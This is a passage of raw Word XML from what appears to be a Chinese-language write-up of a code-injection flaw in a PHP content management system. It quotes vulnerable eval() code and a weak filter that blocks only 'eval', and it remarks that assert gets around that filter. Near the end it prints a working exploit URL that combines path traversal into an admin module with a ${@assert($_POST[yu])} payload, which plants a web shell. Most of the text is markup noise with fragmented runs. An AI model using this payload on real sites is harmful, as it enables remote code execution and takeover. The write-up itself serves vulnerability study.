                    <w:t>"SELECT * FROM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{$pre}jfabout WHERE fid='$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>rs[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>fid]' ORDER BY list");//</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65"/>
                    <w:ind w:left="180" w:right="50"/>
                    <w:rPr>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pP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这里默认查的都是</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/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 xml:space="preserve">1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所以入库的时候</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/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fid</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-71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弄为</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-53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1</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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>$rs2 = $db-&gt;fetch_array($query2)){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="9"/>
                    <w:rPr>
                      <w:rFonts w:ascii="MS Mincho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line="283" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="615" w:firstLine="914"/>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>eval(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"\$rs2[title]=\"$rs2[title]\";");//</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>就</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>eval</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-75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</w:rPr>
                    <w:t>了。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80020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="138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eval(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"\$rs2[content]=\"$rs2[content]\";");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="930" w:right="882"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>jfDB[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$rs[fid]][]=$rs2;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="248" w:lineRule="exact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准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>备</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>写一句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>话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宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>候</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>却</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1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688" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:16.35pt;width:337.5pt;height:99.75pt;z-index:860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function</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> Add_S($array){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foreach(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$array as $key=&gt;$value){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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@eregi(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"['\\\"]+",$key) &amp;&amp; die('ERROR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KEY!');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!is_array($value)){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在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-85"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">inc/common.inc.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中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4"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="229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1585" style="width:338pt;height:263.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6760,5265">
            <v:rect id="_x0000_s1687" style="position:absolute;left:8;top:8;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1686" style="position:absolute;left:188;top:250;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1685" style="position:absolute;left:1104;top:250;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1684" style="position:absolute;left:2020;top:250;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1683" style="position:absolute;left:2936;top:250;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1682" style="position:absolute;left:6189;top:250;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1681" style="position:absolute;left:6310;top:250;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1680" style="position:absolute;left:6430;top:250;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1679" style="position:absolute" from="3,5" to="6757,5" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1678" style="position:absolute" from="5,3" to="5,513" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1677" style="position:absolute" from="6755,7" to="6755,514" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1676" style="position:absolute;left:8;top:513;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1675" style="position:absolute;left:188;top:547;width:1325;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1674" style="position:absolute;left:1513;top:547;width:507;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1673" style="position:absolute;left:2020;top:547;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1672" style="position:absolute;left:2261;top:547;width:1800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1671" style="position:absolute" from="5,513" to="5,839" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1670" style="position:absolute" from="6755,513" to="6755,839" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1669" style="position:absolute;left:8;top:839;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1668" style="position:absolute;left:188;top:903;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1667" style="position:absolute;left:1104;top:903;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1666" style="position:absolute" from="5,839" to="5,1165" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1665" style="position:absolute" from="6755,839" to="6755,1165" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1664" style="position:absolute;left:8;top:1166;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1663" style="position:absolute;left:188;top:1228;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1662" style="position:absolute;left:1104;top:1228;width:4097;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1661" style="position:absolute;left:5201;top:1228;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1660" style="position:absolute;left:5321;top:1228;width:1326;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1659" style="position:absolute" from="5,1166" to="5,1492" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1658" style="position:absolute" from="6755,1166" to="6755,1492" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1657" style="position:absolute;left:8;top:1491;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1656" style="position:absolute;left:188;top:1524;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1655" style="position:absolute;left:1104;top:1524;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1654" style="position:absolute;left:1345;top:1524;width:1400;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1653" style="position:absolute" from="5,1491" to="5,1817" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1652" style="position:absolute" from="6755,1491" to="6755,1817" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1651" style="position:absolute;left:8;top:1818;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1650" style="position:absolute;left:188;top:1881;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1649" style="position:absolute;left:1104;top:1881;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1648" style="position:absolute;left:2020;top:1881;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1647" style="position:absolute;left:2936;top:1881;width:2771;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1646" style="position:absolute;left:5707;top:1881;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1645" style="position:absolute;left:5828;top:1881;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1644" style="position:absolute;left:6069;top:1881;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1643" style="position:absolute" from="5,1818" to="5,2143" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1642" style="position:absolute" from="6755,1818" to="6755,2143" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1641" style="position:absolute;left:8;top:2144;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1640" style="position:absolute;left:188;top:2206;width:3133;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1639" style="position:absolute" from="5,2144" to="5,2470" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1638" style="position:absolute" from="6755,2144" to="6755,2470" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1637" style="position:absolute;left:8;top:2469;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1636" style="position:absolute;left:188;top:2533;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1635" style="position:absolute;left:1104;top:2533;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1634" style="position:absolute;left:2020;top:2533;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1633" style="position:absolute;left:2936;top:2533;width:2410;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1632" style="position:absolute" from="5,2469" to="5,2795" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1631" style="position:absolute" from="6755,2469" to="6755,2795" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1630" style="position:absolute;left:8;top:2795;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1629" style="position:absolute;left:188;top:2859;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1628" style="position:absolute;left:1104;top:2859;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1627" style="position:absolute;left:2020;top:2859;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1626" style="position:absolute" from="5,2795" to="5,3121" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1625" style="position:absolute" from="6755,2795" to="6755,3121" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1624" style="position:absolute;left:8;top:3121;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1623" style="position:absolute;left:188;top:3185;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1622" style="position:absolute;left:1104;top:3185;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1621" style="position:absolute" from="5,3121" to="5,3447" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1620" style="position:absolute" from="6755,3121" to="6755,3447" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1619" style="position:absolute;left:8;top:3448;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1618" style="position:absolute;left:188;top:3510;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1617" style="position:absolute;left:1104;top:3510;width:3976;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1616" style="position:absolute;left:5080;top:3510;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1615" style="position:absolute" from="5,3448" to="5,3774" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1614" style="position:absolute" from="6755,3448" to="6755,3774" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1613" style="position:absolute;left:8;top:3774;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1612" style="position:absolute;left:188;top:3836;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1611" style="position:absolute;left:1104;top:3836;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1610" style="position:absolute;left:2020;top:3836;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1609" style="position:absolute" from="5,3774" to="5,4100" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1608" style="position:absolute" from="6755,3774" to="6755,4100" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1607" style="position:absolute;left:8;top:4100;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1606" style="position:absolute;left:188;top:4163;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1605" style="position:absolute;left:1104;top:4163;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1604" style="position:absolute" from="5,4100" to="5,4426" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1603" style="position:absolute" from="6755,4100" to="6755,4426" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1602" style="position:absolute;left:8;top:4425;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1601" style="position:absolute;left:188;top:4489;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1600" style="position:absolute;left:1104;top:4489;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1599" style="position:absolute;left:1827;top:4489;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1598" style="position:absolute;left:1947;top:4489;width:844;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1597" style="position:absolute" from="5,4425" to="5,4751" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1596" style="position:absolute" from="6755,4425" to="6755,4751" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1595" style="position:absolute;left:8;top:4751;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1594" style="position:absolute;left:188;top:4815;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1593" style="position:absolute" from="3,5260" to="6757,5260" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1592" style="position:absolute" from="5,4751" to="5,5262" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1591" style="position:absolute" from="6755,4751" to="6755,5262" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:shape id="_x0000_s1590" type="#_x0000_t202" style="position:absolute;left:189;top:590;width:1323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x"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,$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value);</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s1589" type="#_x0000_t202" style="position:absolute;left:2020;top:252;width:4411;height:538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left="916" w:right="-2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$value=str_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replace(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"&amp;#x","&amp; #</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="62" w:line="276" w:lineRule="exact"/>
                      <w:ind w:right="-20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过滤一些不安全字符</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s1588" type="#_x0000_t202" style="position:absolute;left:189;top:1229;width:6456;height:182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left="914" w:right="-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$value=preg_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replace(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"/eval/i","eva</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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l",$value);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="65"/>
                      <w:ind w:left="914" w:right="-7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rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>过滤不安全函数</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112"/>
                      <w:ind w:left="2748" w:right="-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!get_magic_quotes_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gpc(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 &amp;&amp;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:right="-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$value=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$value);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="2748" w:right="-7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array[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$key]=$value;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124" w:line="200" w:lineRule="exact"/>
                      <w:ind w:left="1831" w:right="-7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}else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{</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s1587" type="#_x0000_t202" style="position:absolute;left:1103;top:3511;width:3975;height:117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$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array[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$key]=Add_S($array[$key]);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="91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 w:line="200" w:lineRule="exact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return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$array;</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s1586" type="#_x0000_t202" style="position:absolute;left:189;top:4814;width:120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pStyle w:val="a3"/>
        <w:spacing w:line="245" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把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eval </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样我们就用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-54"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">assert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把。</w:t>
      </w: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rPr>
          <w:rFonts w:ascii="MS Mincho"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="321" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="500"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId103">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Verdana"/>
          </w:rPr>
          <w:t>http://web/new/fenlei/search.php?mid=1&amp;action=search&amp;key</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>word=asd&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>postdb[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>city_id]=../../admin/hack&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve">hack=jfadmin&amp;a ction=addjf&amp;Apower[jfadmin_mod]=1&amp;fid=1&amp;title=${@assert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>($_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>POST[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>yu])}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
